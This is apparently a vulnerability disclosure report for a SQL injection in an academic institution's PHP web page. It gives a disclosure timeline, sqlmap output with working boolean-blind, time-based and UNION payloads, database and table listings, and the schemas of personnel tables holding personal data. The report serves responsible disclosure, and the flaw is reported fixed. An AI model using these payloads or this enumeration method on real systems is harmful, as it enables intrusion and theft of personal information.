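2015-12-07: Details reported to the vendor; awaiting vendor response
2015-12-10: Vendor confirmed; details disclosed to the vendor only
2015-12-20: Details disclosed to core white hats and experts in related fields
2015-12-30: Details disclosed to regular white hats
2016-01-09: Details disclosed to intern white hats
2016-01-12: Vendor fixed the vulnerability and proactively disclosed it; details made public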
Injection point (id_key): http://**.**.**.**/directory_user_en.php?id_key=7&eng=T
sqlmap identified the following injection point(s) with a total of 69 HTTP(s) requests:
---
Parameter: id_key (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id_key=1 AND 7686=7686&eng=T

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id_key=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x556a4e4b437368726857,0x7162786b71)-- &eng=T
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.5.21, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0

sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id_key (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id_key=7 AND 1534=1534&eng=T

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id_key=7 AND SLEEP(5)&eng=T

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id_key=7 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171767871,0x555273466d74766e6a44,0x7162767171)-- &eng=T
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.5.21, Apache 2.2.15
back-end DBMS: MySQL 5.0.12
current database: 'teacher'
current user is DBA: False
available databases [44]:
[*] #mysql50#lost+found
[*] #mysql50#mysql.old
[*] academia
[*] acclab
[*] admin_document
[*] adminsys
[*] applysys
[*] asiopsclpl
[*] auto_web
[*] bspl
[*] calendar
[*] Computer_room
[*] dayoffsys
[*] document
[*] emergercy
[*] engineer
[*] forums
[*] goods
[*] hpmachine
[*] hssp
[*] imaging
[*] information_schema
[*] intranet
[*] jobfaq
[*] lab
[*] library
[*] lowtemp
[*] material
[*] meal
[*] meeting
[*] mysql
[*] nano_public_facility
[*] nanofacility
[*] nonlinear
[*] nscsys
[*] nscsystem
[*] OpenXcience
[*] performance_schema
[*] physadmin
[*] purchase
[*] repair
[*] student
[*] teacher
[*] wwwgroup
A quick look at a few of the databases:
Database: teacher
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| modify_log        | 5214    |
| basic_publication | 1366    |
| basic_experience  | 353     |
| basic_interest    | 229     |
| res_id            | 185     |
| basic_school      | 127     |
| basic             | 110     |
| basic_other       | 100     |
| basic_postdoc     | 38      |
| basic_recenttalk  | 23      |
+-------------------+---------+

Database: student
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| homework     | 5205    |
| answer       | 2732    |
| phorum       | 666     |
| login_log    | 569     |
| name_list    | 464     |
| work_list    | 202     |
| question     | 25      |
| webtree      | 14      |
| time_setting | 2       |
| users        | 1       |
+--------------+---------+
This database holds considerably more information:
Database: physadmin
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| bulletin_file          | 10546   |
| employ_record          | 9789    |
| employ_record_20150629 | 9378    |
| employ_status          | 9140    |
| person_require         | 7158    |
| bulletin               | 6631    |
| person_attach          | 6531    |
| personnel_log          | 6463    |
| company                | 3894    |
| tenders_status         | 2775    |
| demit_status           | 2445    |
| personnel_record       | 2438    |
| book_propose           | 2155    |
| oa_occupation          | 2152    |
| student_record         | 1793    |
| visitor_others         | 1546    |
| visitor_status         | 1546    |
| visitor_record         | 1545    |
| studentcard_tmp        | 1332    |
| oa_school              | 1200    |
| general_status         | 1189    |
| personnel_visitor      | 1131    |
| oa_person              | 1088    |
| personnel_student      | 1048    |
| rights                 | 749     |
| job                    | 637     |
| project_all            | 628     |
| tenders                | 627     |
| student_status         | 563     |
| studentcard            | 425     |
| general_tel            | 393     |
| general_car            | 264     |
| nation                 | 240     |
| new_personnel          | 235     |
| personnel_record_log   | 229     |
| tenders_file           | 205     |
| subtask                | 197     |
| users                  | 183     |
| job_table              | 178     |
| car_status             | 140     |
| personnel_a            | 123     |
| group_teacher          | 63      |
| position_table         | 55      |
| pay_voucher            | 54      |
| sys_table              | 52      |
| task                   | 34      |
| pay_cash               | 26      |
| book_back              | 25      |
| secretballot           | 22      |
| handicap               | 16      |
| suppagent              | 15      |
| aborigine              | 14      |
| group_pro              | 14      |
| bulletin_group         | 13      |
| mainblock              | 12      |
| pay_rank               | 11      |
| handicap_level         | 4       |
| state                  | 4       |
| aborigine_level        | 3       |
| announce               | 3       |
| company_type           | 3       |
| maildepart_log         | 3       |
| agent_table            | 1       |
| person_delete          | 1       |
+------------------------+---------+
Personal information:
Table: personnel_record
[38 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| aborigine       | varchar(10)  |
| account         | varchar(15)  |
| acct_pos_ac     | varchar(10)  |
| acct_pos_no     | varchar(10)  |
| address         | tinytext     |
| addrnow         | tinytext     |
| arrdate         | date         |
| birthdate       | date         |
| cname           | varchar(20)  |
| doorcard        | varchar(15)  |
| email           | varchar(120) |
| email2          | varchar(100) |
| ename           | varchar(40)  |
| flag            | tinyint(1)   |
| handicap        | varchar(10)  |
| handphone       | varchar(12)  |
| hometel         | varchar(15)  |
| hometown        | varchar(10)  |
| icno            | varchar(20)  |
| ictype          | tinyint(1)   |
| kindred         | varchar(20)  |
| kindredtel      | varchar(15)  |
| marriage        | tinyint(1)   |
| martialdatefrom | date         |
| martialdateto   | date         |
| nationality     | varchar(20)  |
| offdate         | date         |
| passno          | varchar(20)  |
| personid        | int(11)      |
| picture         | varchar(20)  |
| pnotes          | tinytext     |
| research        | tinyint(4)   |
| research_type   | tinyint(4)   |
| sameaddr        | tinyint(1)   |
| servicecard     | varchar(15)  |
| sex             | char(2)      |
| zip             | varchar(6)   |
| zipnow          | varchar(5)   |
+-----------------+--------------+
To illustrate: phone numbers, home addresses, ID card information, email addresses and so on, several thousand of them:
Table: employ_record
[35 columns]
+----------------+--------------------------+
| Column         | Type                     |
+----------------+--------------------------+
| position       | varchar(4)               |
| applydatefrom  | date                     |
| applydatefrom2 | date                     |
| applydatefrom3 | date                     |
| applydateto    | date                     |
| applydateto2   | date                     |
| applydateto3   | date                     |
| chief          | varchar(20)              |
| demitid        | int(11)                  |
| employid       | int(11)                  |
| insure         | varchar(10)              |
| lpdate         | date                     |
| new_posi       | varchar(100)             |
| notes          | tinytext                 |
| otherpj2       | tinytext                 |
| p_name         | varchar(40)              |
| pay_rank       | varchar(50)              |
| payfrom        | varchar(20)              |
| payoption      | tinyint(1)               |
| paytype        | tinyint(1)               |
| personid       | int(11)                  |
| proj_q_id      | varchar(10)              |
| project_id     | varchar(70)              |
| project_name   | tinytext                 |
| ps             | varchar(20)              |
| salary         | int(6) unsigned zerofill |
| salary2        | int(6) unsigned zerofill |
| salary3        | int(6) unsigned zerofill |
| sm             | varchar(100)             |
| subtask        | char(3)                  |
| suppagent      | char(3)                  |
| task           | char(3)                  |
| workpay        | varchar(20)              |
| worktype       | tinyint(1)               |
| yearno         | char(3)                  |
+----------------+--------------------------+
There are close to ten thousand records, so I did not dump them.
Severity: High
Vulnerability Rank: 16
Confirmation time: 2015-12-10 01:46
Thank you for the report.
2016-01-12: Fixed